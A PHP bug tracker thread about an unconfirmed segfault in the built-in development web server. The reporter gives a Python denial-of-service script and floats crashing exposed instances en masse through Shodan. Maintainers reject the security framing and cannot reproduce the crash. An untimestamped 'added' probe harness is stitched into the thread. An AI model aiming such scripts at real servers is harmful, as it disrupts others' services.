Bug #78047 [DoS] Segmentation fault through HTTP Requests
Submitted: 2019-05-21 11:45 UTC Modified: 2019-05-23 13:30 UTC
Votes:10
Avg. Score:4.3 ± 1.2
Reproduced:0 of 0 (0.0%)
From: michele dot cisternino at protonmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: 7.3Git-2019-05-21 (snap) OS: Linux
Private report: No CVE-ID: None

 [2019-05-21 11:45 UTC] michele dot cisternino at protonmail dot com
Description:
------------
Hi,

I found a vulnerability while I was testing the PHP built-in web server.
The vulnerability could be exploited by an attacker to crash the server causing a segmentation fault.

I think the vulnerability resides in the way the server handles HTTP requests.

The steps to reproduce the segmentation fault are the following:

$ apt install php
$ mkdir server
$ cd server
$ touch file.php
$ php -S 0.0.0.0:80
$ python exploit.py 127.0.0.1 #But could be a remote server as well

You can find the exploit in the "Test script" section.

Further investigation of the issue could lead an attacker to exploit the memory corruption in the server to get a reverse shell (e.g. buffer overflow).
Anyway, with the actual exploit an attacker could already DoS the server.

Test script:
---------------
import sys
import requests

if len(sys.argv) < 2:
    print("[!] Usage: %s TARGET" % sys.argv[0])
    sys.exit(1)

target = sys.argv[1].strip()

# Normalise the target to an absolute URL that ends in "/".
if not target.startswith("http://") and not target.startswith("https://"):
    target = "http://" + target

if not target.endswith("/"):
    target = target + "/"

# Request order: base URL, existing file, non-existent file, base URL.
filenames = ["", "file.php", "test.php", ""]

print("[*] Sending requests to %s." % target)
try:
    for filename in filenames:
        requests.get(target + filename)
    print("The exploit didn't work.")
except requests.exceptions.ConnectionError:
    # A refused/reset connection is taken as the server having died.
    print("The exploit worked!")

Expected result:
----------------
The server crashes with a "Segmentation fault" error.


History

 [2019-05-21 15:18 UTC] michele dot cisternino at protonmail dot com
The exploit consists of sending HTTP requests in the following order:

1 - Request the base URL
2 - Request a valid file on the server
3 - Request a non-existent file on the server
4 - Request the base URL
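The four-request sequence above, as an added reproduction harness that is not part of the original report or of PHP: it uses only the standard library, sends each request on its own TCP connection so the exact bytes on the wire are visible, records the status line for each step, and reports the first step at which the server stops answering (nikic could not reproduce the crash, so a "not reproduced" result is the expected one on a healthy build). The host, port and probe paths are assumptions taken from the report's steps (php -S 0.0.0.0:80 with an empty file.php); the stub server is a constructed stand-in so the harness can be exercised offline.

```python
import http.server
import socket
import sys
import threading

# Same order as the report: base URL, existing file, missing file, base URL.
DEFAULT_PATHS = ["/", "/file.php", "/test.php", "/"]


def send_request(host, port, path, timeout=3.0):
    """Send one minimal HTTP/1.1 GET on a fresh connection.

    Returns the status line (e.g. 'HTTP/1.1 200 OK'), or None when the
    server refuses or resets the connection, never answers, or answers
    with something that is not an HTTP status line.
    """
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            while b"\r\n" not in data:
                chunk = sock.recv(1024)
                if not chunk:  # peer closed before a full status line
                    break
                data += chunk
    except OSError:  # ConnectionRefusedError, ConnectionResetError, timeout
        return None
    line = data.split(b"\r\n", 1)[0]
    return line.decode("latin-1") if line.startswith(b"HTTP/") else None


def probe(host, port, paths=DEFAULT_PATHS):
    """Run the sequence and return (status_lines, crashed_at).

    status_lines holds one entry per request actually sent; crashed_at is
    the 0-based index of the first request the server did not answer, or
    None when it answered all of them (crash not reproduced).
    """
    statuses = []
    for index, path in enumerate(paths):
        status = send_request(host, port, path)
        statuses.append(status)
        if status is None:
            return statuses, index
    return statuses, None


class _StubHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the PHP server: 200 for "/" and
    "/file.php", 404 for anything else. It never crashes."""

    def do_GET(self):
        code = 200 if self.path in ("/", "/file.php") else 404
        self.send_response(code)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_stub_server():
    """Start the stub on an ephemeral loopback port; returns (server, port)."""
    server = http.server.HTTPServer(("127.0.0.1", 0), _StubHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def stop_stub_server(server):
    server.shutdown()
    server.server_close()


if __name__ == "__main__":
    # Usage: python probe.py [HOST] [PORT]; defaults match the report.
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    statuses, crashed_at = probe(host, port)
    for path, status in zip(DEFAULT_PATHS, statuses):
        print(f"{path:12} -> {status or 'no response'}")
    if crashed_at is None:
        print("Server answered every request; crash not reproduced.")
    else:
        print(f"Server stopped answering at request {crashed_at + 1}.")
```

Against a real target, run it with the host and port of the `php -S` instance; a crash shows up as the step index at which the connection is refused, which is the detail the original script does not report. Note that a refused connection on the very first request means the server was not reachable to begin with, not that the sequence crashed it.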
 [2019-05-21 17:46 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2019-05-21 17:46 UTC] cmb@php.net
> The vulnerability could be exploited by an attacker […]

No, it can not, because the built-in webserver is for
*development* purposes only.
 [2019-05-21 18:35 UTC] michele dot cisternino at protonmail dot com
Sorry for the late reply.

Yes, the server is usually used for testing purposes, but it can be exposed to the internet as well.
You can launch a simple query on Shodan to find multiple instances of the built-in PHP server exposed.

An attacker could write a script that launches a request to Shodan's API, gets a list of vulnerable instances and DoSes them all iteratively.

Moreover, in my daily pentest job, I found this kind of server not exposed to the internet, but used internally by companies.
An attacker, thanks to the exploit I wrote, could cause a continuous DoS.

Moreover, as I already said, the vulnerability could be further investigated to upgrade it to an RCE.

I hope you understand the criticality of the vulnerability.
 [2019-05-22 07:40 UTC] cmb@php.net
To clarify: the built-in web server *can* of course be connected
to a public network; it is, however, not supposed to[1].  Therefore
we do not consider any issues related to the built-in web server
to be security issues.

[1] <https://www.php.net/manual/en/features.commandline.webserver.php>
 [2019-05-22 07:57 UTC] michele dot cisternino at protonmail dot com
I disagree, respectfully.
A malicious user, thanks to this exploit, can crash all the public instances of the built-in server (around 2,000, in my search).

Anyway, if you don't agree, I can disclose it (you also switched the status from Private to Public), so we can see what the hacking community think about it.

Have a nice day :)
 [2019-05-22 08:12 UTC] spam2 at rhsoft dot net
> can crash all the public instances of the built-in server

hopefully and then the people maybe read the first red box at https://www.php.net/manual/en/features.commandline.webserver.php
 [2019-05-23 09:25 UTC] nikic@php.net
I can't reproduce this on a 7.3 nts build. Also no warnings when running under valgrind.
 [2019-05-23 13:30 UTC] michele dot cisternino at protonmail dot com
It doesn't matter anymore :')
It's just a bug, rofl.
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Sun Jun 16 21:01:28 2019 UTC